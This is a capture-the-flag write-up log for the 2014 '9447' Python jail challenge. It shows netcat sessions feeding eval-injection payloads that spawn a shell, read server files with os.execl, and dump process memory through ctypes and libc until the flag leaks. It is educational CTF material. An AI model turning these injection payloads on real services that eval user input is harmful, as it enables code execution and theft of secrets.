9447ctf2014/exploitation/fuckpyjails/fuckpyjails.txt
% # Get Apple Color Emoji or GTFO ðŸ†’â™¥ï¸ðŸ‹ðŸ‡ºðŸ‡¸ðŸ‡°ðŸ‡·ðŸ†ðŸ˜¤â€¼ï¸ðŸ‘
% nc fuckpyjails.9447.plumbing 9447
>>> 1+1
Fail!
% # ðŸ˜Ÿ
% nc fuckpyjails.9447.plumbing 9447
>>> 
Traceback (most recent call last):
  File "/home/ctf/fuckpyjails.py", line 18, in <module>
    if get_key() is eval(raw_input()):
  File "<string>", line 0
    
    ^
SyntaxError: unexpected EOF while parsing
% # ðŸ˜ƒ
% nc fuckpyjails.9447.plumbing 9447
>>> __import__('os').system('sh')
Fail!
% # ðŸ˜ž
% nc fuckpyjails.9447.plumbing 9447
>>> get_key()
Fail!
% # ðŸ˜Ÿ
% nc fuckpyjails.9447.plumbing 9447
>>> __import__('sys').stdout.write('yo')
yoFail!
% # ðŸ˜³
% nc fuckpyjails.9447.plumbing 9447
>>> __import__('os').execl("/bin/ls", "ls")
bin   keyserver startup2.sh
etc   lib       tmp
home  lib64     usr
% # ðŸ˜‚
% nc fuckpyjails.9447.plumbing 9447
>>> __import__('os').execl("/bin/cat", "cat", "/home/ctf/fuckpyjails.py")
#!/usr/bin/env python
import sys
import socket
import resource

resource.setrlimit(resource.RLIMIT_NPROC, (0, 0))

def get_key():
  s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
  s.connect("/keyserver")
  r = s.recv(64)
  s.close()
  return r

sys.stdout.write(">>> ")
sys.stdout.flush()

if get_key() is eval(raw_input()):
  print "Did you get the key?"
else:
  print "Fail!"
% # ðŸ˜›
% nc fuckpyjails.9447.plumbing 9447
>>> __import__('sys').stdout.write(get_key())
I already sent you the key, you dummy!Fail!
% # ðŸ˜¯
% nc fuckpyjails.9447.plumbing 9447
>>> __import__('os').execl("/bin/cat", "cat", "/keyserver")
I already sent you the key, you dummy!
% # HAH! Nice one, mates.
% nc fuckpyjails.9447.plumbing 9447
...1 hour of trying stuff like __import__('sys').stdout.write(repr(__import__('gc').get_objects()))...
% # ðŸ˜°ðŸ˜–ðŸ˜¡
% nc fuckpyjails.9447.plumbing 9447
>>> reduce(lambda x, y: 0, (libc.write(1, ctypes.cast(i, ctypes.c_char_p), 0x1000) for ctypes in (__import__("ctypes"),) for libc in (ctypes.cdll.LoadLibrary("libc.so.6"),) for addr in (id("my new str")&~0xFFF,) for i in xrange(addr, 0, -0x1000)))
...9447{seriously_eval_is_lame}...
% # ðŸ˜Ž